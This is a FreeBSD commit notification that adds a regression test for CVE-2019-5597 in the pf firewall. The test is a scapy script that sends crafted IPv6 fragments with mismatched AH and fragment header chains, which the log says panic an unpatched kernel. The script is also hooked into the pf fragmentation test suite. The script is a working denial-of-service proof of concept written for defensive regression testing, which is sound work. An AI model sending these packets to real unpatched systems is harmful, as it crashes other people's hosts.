From owner-svn-src-head@freebsd.org Fri Mar 1 07:39:57 2019 Return-Path: Delivered-To: svn-src-head@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2610:1c1:1:606c::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 3E0BA1511D68; Fri, 1 Mar 2019 07:39:57 +0000 (UTC) (envelope-from kp@FreeBSD.org) Received: from mxrelay.nyi.freebsd.org (mxrelay.nyi.freebsd.org [IPv6:2610:1c1:1:606c::19:3]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) server-signature RSA-PSS (4096 bits) client-signature RSA-PSS (4096 bits) client-digest SHA256) (Client CN "mxrelay.nyi.freebsd.org", Issuer "Let's Encrypt Authority X3" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id D3D388EBC8; Fri, 1 Mar 2019 07:39:56 +0000 (UTC) (envelope-from kp@FreeBSD.org) Received: from repo.freebsd.org (repo.freebsd.org [IPv6:2610:1c1:1:6068::e6a:0]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mxrelay.nyi.freebsd.org (Postfix) with ESMTPS id A6898198A3; Fri, 1 Mar 2019 07:39:56 +0000 (UTC) (envelope-from kp@FreeBSD.org) Received: from repo.freebsd.org ([127.0.1.37]) by repo.freebsd.org (8.15.2/8.15.2) with ESMTP id x217duZp028945; Fri, 1 Mar 2019 07:39:56 GMT (envelope-from kp@FreeBSD.org) Received: (from kp@localhost) by repo.freebsd.org (8.15.2/8.15.2/Submit) id x217du5R028943; Fri, 1 Mar 2019 07:39:56 GMT (envelope-from kp@FreeBSD.org) Message-Id: <201903010739.x217du5R028943@repo.freebsd.org> X-Authentication-Warning: repo.freebsd.org: kp set sender to kp@FreeBSD.org using -f From: Kristof Provost Date: Fri, 1 Mar 2019 07:39:56 +0000 (UTC) To: src-committers@freebsd.org, svn-src-all@freebsd.org, svn-src-head@freebsd.org Subject: svn commit: r344692 - head/tests/sys/netpfil/pf X-SVN-Group: head X-SVN-Commit-Author: kp X-SVN-Commit-Paths: head/tests/sys/netpfil/pf X-SVN-Commit-Revision: 344692 X-SVN-Commit-Repository: base MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit X-Rspamd-Queue-Id: D3D388EBC8 X-Spamd-Bar: -- Authentication-Results: mx1.freebsd.org X-Spamd-Result: default: False [-2.85 / 15.00]; local_wl_from(0.00)[FreeBSD.org]; NEURAL_HAM_MEDIUM(-1.00)[-0.999,0]; NEURAL_HAM_SHORT(-0.85)[-0.851,0]; NEURAL_HAM_LONG(-1.00)[-1.000,0]; ASN(0.00)[asn:11403, ipnet:2610:1c1:1::/48, country:US] X-BeenThere: svn-src-head@freebsd.org X-Mailman-Version: 2.1.29 Precedence: list List-Id: SVN commit messages for the src tree for head/-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 01 Mar 2019 07:39:57 -0000 Author: kp Date: Fri Mar 1 07:39:55 2019 New Revision: 344692 URL: https://svnweb.freebsd.org/changeset/base/344692 Log: pf tests: Test CVE-2019-5597 Generate a fragmented packet with different header chains, to provoke the incorrect behaviour of pf. Without the fix this will trigger a panic. Obtained from: Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv Added: head/tests/sys/netpfil/pf/CVE-2019-5597.py (contents, props changed) Modified: head/tests/sys/netpfil/pf/Makefile head/tests/sys/netpfil/pf/fragmentation.sh Added: head/tests/sys/netpfil/pf/CVE-2019-5597.py ============================================================================== --- /dev/null 00:00:00 1970 (empty, because file is newly added) +++ head/tests/sys/netpfil/pf/CVE-2019-5597.py Fri Mar 1 07:39:55 2019 (r344692) @@ -0,0 +1,35 @@ +#!/usr/local/bin/python2.7 + +import random +import scapy.all as sp +import sys + +UDP_PROTO = 17 +AH_PROTO = 51 +FRAG_PROTO = 44 + +def main(): + intf = sys.argv[1] + ipv6_src = sys.argv[2] + ipv6_dst = sys.argv[3] + + ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src) + + padding = 8 + fid = random.randint(0,100000) + frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0) + frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8) + + pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \ + / sp.Raw('XXXX' * 199) \ + / sp.AH(nh=FRAG_PROTO, payloadlen=1) \ + / frag_1 + + pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding) + pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding) + + sp.sendp(pkt0, iface=intf, verbose=False) + sp.sendp(pkt1, iface=intf, verbose=False) + +if __name__ == '__main__': + main() Modified: head/tests/sys/netpfil/pf/Makefile ============================================================================== --- head/tests/sys/netpfil/pf/Makefile Fri Mar 1 07:37:45 2019 (r344691) +++ head/tests/sys/netpfil/pf/Makefile Fri Mar 1 07:39:55 2019 (r344692) @@ -20,8 +20,10 @@ ATF_TESTS_SH+= anchor \ ${PACKAGE}FILES+= utils.subr \ echo_inetd.conf \ - pft_ping.py + pft_ping.py \ + CVE-2019-5597.py ${PACKAGE}FILESMODE_pft_ping.py= 0555 +${PACKAGE}FILESMODE_CVE-2019-5597.py= 0555 .include Modified: head/tests/sys/netpfil/pf/fragmentation.sh ============================================================================== --- head/tests/sys/netpfil/pf/fragmentation.sh Fri Mar 1 07:37:45 2019 (r344691) +++ head/tests/sys/netpfil/pf/fragmentation.sh Fri Mar 1 07:39:55 2019 (r344692) @@ -104,6 +104,11 @@ v6_body() atf_check -s exit:0 -o ignore\ ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3 + + $(atf_get_srcdir)/CVE-2019-5597.py \ + ${epair_send}a \ + 2001:db8:42::1 \ + 2001:db8:43::3 } v6_cleanup()